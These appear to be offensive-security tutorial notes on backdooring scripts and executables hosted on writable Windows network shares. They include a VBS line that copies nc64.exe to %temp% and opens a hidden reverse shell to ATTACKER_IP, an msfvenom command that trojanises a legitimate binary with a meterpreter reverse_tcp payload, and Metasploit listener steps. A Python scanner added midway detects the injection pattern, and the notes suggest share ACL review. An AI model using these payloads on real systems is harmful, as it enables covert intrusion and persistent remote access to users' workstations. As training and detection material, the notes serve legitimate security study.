Abusing writable shares

Resources
- CreateObject function
- Wscript.Shell object
- Run method
- copy
- msfvenom

Backdoor mechanism
It is quite common to find network shares that host executables or scripts created by the administrator, which users can run to perform daily tasks. This is convenient for users, since they can execute the shared resource without copying or installing it.
Whenever a user opens the shortcut on their workstation, the executable or script is copied from the server to the local %temp% folder, where it is executed. Thus, any payload will run on the user's workstation, in the context of the logged-in user account.
If the share is writable by anyone (or at least by our compromised account), we can abuse this to create a backdoor.
(1) Backdoor via .vbs scripts
Given that we have found a VBS (.vbs) script hosted on the share, we can inject malicious code into the found script to provide ourselves with a backdoor.
Step 1
First, we have to upload a binary (such as nc64.exe) to the share. This will aid us in creating the backdoor. This can be achieved using smbclient.
Step 2
Next, we can inject the malicious commands into the existing script. The inserted command assumes that the writable share is hosted at \\TARGET_IP\writable_share.
CreateObject("WScript.Shell").Run "cmd.exe /c copy /y \\TARGET_IP\writable_share\nc64.exe %temp% & %temp%\nc64.exe -e cmd.exe ATTACKER_IP PORT", 0, True
The following outlines the main steps:
(1) Create a new WScript.Shell object and run an external command using the Run method; the WScript.Shell object provides access to the OS shell methods.
According to the Run method documentation (see Resources), the last two values passed to the Run method have the following meaning. In our example, the values are 0, True.
intWindowStyle: Optional. Integer value indicating the appearance of the program's window. Note that not all programs make use of this information. A value of 0 "hides the window and activates another window."
bWaitOnReturn: Optional. Boolean value indicating whether the script should wait for the program to finish executing before continuing to the next statement in your script. If set to True, script execution halts until the program finishes.
(2) Execute commands using cmd.exe to call the copy command, which copies the uploaded nc64.exe binary from the share to the %temp% directory. The /y flag provided to copy is used to "suppress prompting to confirm that you want to overwrite an existing destination file."
(3) Execute a reverse shell that provides us with a backdoor to the system.
Step 3
Finally, we have to start a listener using exploit/multi/handler from Metasploit. Now, we will gain a remote shell on a user's desktop whenever someone executes this script.
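From the defender's side, the injected line above has a recognisable shape: a WScript.Shell Run call, hidden window, that copies a file from a UNC path into %temp% and executes it from there. The following Python scanner, added here as an example and not part of the original notes, walks the script files on a mounted share and flags that pattern; the indicator regexes, extension list and sample scripts are constructed for this example.

```python
import re
from pathlib import Path

# Indicator regexes (constructed for this example) for the injection pattern in the notes:
# a WScript.Shell Run call that copies a file from a UNC path into %temp%, executes it
# from there, and hides the window (intWindowStyle 0, bWaitOnReturn True).
INDICATORS = [
    ("wscript_shell_run", re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)\s*\.Run\b', re.I)),
    ("unc_copy_to_temp", re.compile(r'\bcopy\b[^"\n]*\\\\[^"\s]+[^"\n]*%temp%', re.I)),
    ("exec_from_temp", re.compile(r'%temp%\\[^\s"&]+\.exe', re.I)),
    ("hidden_window", re.compile(r',\s*0\s*,\s*True\s*$', re.I | re.M)),
]

# Script types a share might host (assumed list); extend to match what the administrator publishes.
SCRIPT_EXTS = (".vbs", ".vbe", ".wsf", ".js", ".bat", ".cmd", ".ps1")

def scan_script_text(text: str) -> list[str]:
    """Return the names of all indicators found in a script's text, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def is_suspicious(text: str) -> bool:
    """Flag a script only when it spawns a shell AND stages a payload via %temp%.
    Requiring both keeps benign admin scripts that merely call Run from being reported."""
    hits = set(scan_script_text(text))
    return "wscript_shell_run" in hits and ("unc_copy_to_temp" in hits or "exec_from_temp" in hits)

def scan_share(root: str) -> dict[str, list[str]]:
    """Walk a locally mounted copy of the share and report flagged scripts with their indicators."""
    findings: dict[str, list[str]] = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTS:
            try:
                text = path.read_text(errors="ignore")
            except OSError:
                continue  # unreadable entries are skipped, not treated as clean
            if is_suspicious(text):
                findings[str(path)] = scan_script_text(text)
    return findings

# Constructed samples: a benign admin script, and the same script with the line from the notes appended.
BENIGN = ('Set fso = CreateObject("Scripting.FileSystemObject")\n'
          'fso.CopyFile "C:\\reports\\*.csv", "D:\\archive\\"\n')
INJECTED = BENIGN + ('CreateObject("WScript.Shell").Run "cmd.exe /c copy /y '
                     '\\\\TARGET_IP\\writable_share\\nc64.exe %temp% & %temp%\\nc64.exe '
                     '-e cmd.exe ATTACKER_IP PORT", 0, True\n')

if __name__ == "__main__":
    print("benign flagged:", is_suspicious(BENIGN), "| injected flagged:", is_suspicious(INJECTED))
```

Pair the scan with a review of the share's ACL: a script that only the administrator can modify cannot be tampered with this way in the first place.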
(2) Backdoor via .exe files
Given that we have found a Windows binary such as an .exe file, we can download it from the share and use msfvenom to inject a backdoor functionality. The result is a binary that still fulfils its original purpose, but executes an additional payload silently.
Step 1
We can use the downloaded binary as a template to create a new malicious binary (suppose the binary is named vuln.exe):
$ msfvenom --platform windows -x vuln.exe -k -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=PORT -b "\x00" -f exe -o mal_vuln.exe
Step 2
Finally, we have to start a listener using exploit/multi/handler from Metasploit. Now, we will gain a remote shell on a user's desktop whenever someone executes the binary.